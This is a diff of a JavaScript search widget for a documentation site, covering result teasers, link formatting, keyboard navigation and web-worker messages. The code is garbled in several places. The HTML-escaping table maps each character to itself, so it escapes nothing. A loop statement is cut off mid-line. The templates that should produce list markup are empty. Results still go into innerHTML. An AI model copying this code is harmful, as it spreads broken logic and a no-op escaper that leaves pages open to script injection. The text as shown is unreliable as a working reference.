- const escapeHTML = (()=>{const M={'&':'&','<':'<','>':'>','"':'"','\'':'''};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})();
- const URL_MARK='highlight';
- function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;}
-
- function makeTeaser(body,terms){
- const stem=w=>elasticlunr.stemmer(w.toLowerCase());
- const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30;
- const W=[],sents=body.toLowerCase().split('. ');
- let i=0,v=W_F,found=false;
- sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;});
- if(!W.length) return body;
- const win=Math.min(W.length,WIN);
- const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)];
- for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1];
- const best=found?sums.lastIndexOf(Math.max(...sums)):0;
- const out=[]; i=W[best][2];
- for(let k=best;k'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push(''); i=pos+w.length;}
- return out.join('');
- }
-
- function format(d,terms){
- const teaser=makeTeaser(escapeHTML(d.body),terms);
- teaserCount++;
- const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27');
- const parts=d.url.split('#'); if(parts.length===1) parts.push('');
- const abs=d.url.startsWith('http');
- const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`;
- const style=d.cloud?" style=\"color:#1e88e5\"":"";
- const isCloud=d.cloud?" [Cloud]":" [Book]";
- return ``+
- `${d.breadcrumbs}${isCloud}${teaser}`;
- }
-
- /* ───────────── UI control ───────────── */
- function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}}
- function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();}
-
- icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden')));
-
- document.addEventListener('keydown',e=>{
- if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return;
- const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName);
- if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();}
- else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}}
- else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}}
- });
-
- bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage(e.target.value.trim()),120); });
-
- /* ───────────── worker messages ───────────── */
- worker.onmessage = ({data}) => {
- if(data && data.ready!==undefined){
- if(data.ready){
- icon.innerHTML=READY_ICON;
- icon.setAttribute('aria-label','Open search (S)');
- icon.removeAttribute('title');
- }
- else {
- icon.textContent='❌';
- icon.setAttribute('aria-label','Search unavailable');
- icon.setAttribute('title','Search is unavailable');
- }
- return;
+
+ const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13;
+ let debounce, teaserCount=0;
+
+ /* ───────────── helpers (teaser, metric) ───────────── */
+ const escapeHTML = (()=>{const M={'&':'&','<':'<','>':'>','"':'"','\'':'''};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})();
+ const URL_MARK='highlight';
+ function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;}
+
+ function makeTeaser(body,terms){
+ const stem=w=>elasticlunr.stemmer(w.toLowerCase());
+ const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30;
+ const W=[],sents=body.toLowerCase().split('. ');
+ let i=0,v=W_F,found=false;
+ sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;});
+ if(!W.length) return body;
+ const win=Math.min(W.length,WIN);
+ const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)];
+ for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1];
+ const best=found?sums.lastIndexOf(Math.max(...sums)):0;
+ const out=[]; i=W[best][2];
+ for(let k=best;k'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push(''); i=pos+w.length;}
+ return out.join('');
}
- const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean);
- header.textContent=metric(docs.length,q);
- clear(list);
- docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);});
- listOut.classList.toggle('hidden',!docs.length);
- };
-})();
-
+
+ function format(d,terms){
+ const teaser=makeTeaser(escapeHTML(d.body),terms);
+ teaserCount++;
+ const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27');
+ const parts=d.url.split('#'); if(parts.length===1) parts.push('');
+ const abs=d.url.startsWith('http');
+ const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`;
+ const style=d.cloud?" style=\"color:#1e88e5\"":"";
+ const isCloud=d.cloud?" [Cloud]":" [Book]";
+ return ``+
+ `${d.breadcrumbs}${isCloud}${teaser}`;
+ }
+
+ /* ───────────── UI control ───────────── */
+ function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}}
+ function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();}
+
+ icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden')));
+
+ document.addEventListener('keydown',e=>{
+ if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return;
+ const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName);
+ if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();}
+ else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}}
+ else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}}
+ });
+
+ bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage({query: e.target.value.trim()}),120); });
+
+ /* ───────────── worker messages ───────────── */
+ worker.onmessage = ({data}) => {
+ if(data && data.ready!==undefined){
+ if(data.ready){
+ icon.innerHTML=READY_ICON;
+ icon.setAttribute('aria-label','Open search (S)');
+ icon.removeAttribute('title');
+ }
+ else {
+ icon.textContent='❌';
+ icon.setAttribute('aria-label','Search unavailable');
+ icon.setAttribute('title','Search is unavailable');
+ }
+ return;
+ }
+ const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean);
+ header.textContent=metric(docs.length,q);
+ clear(list);
+ docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);});
+ listOut.classList.toggle('hidden',!docs.length);
+ };
+ })();
+
\ No newline at end of file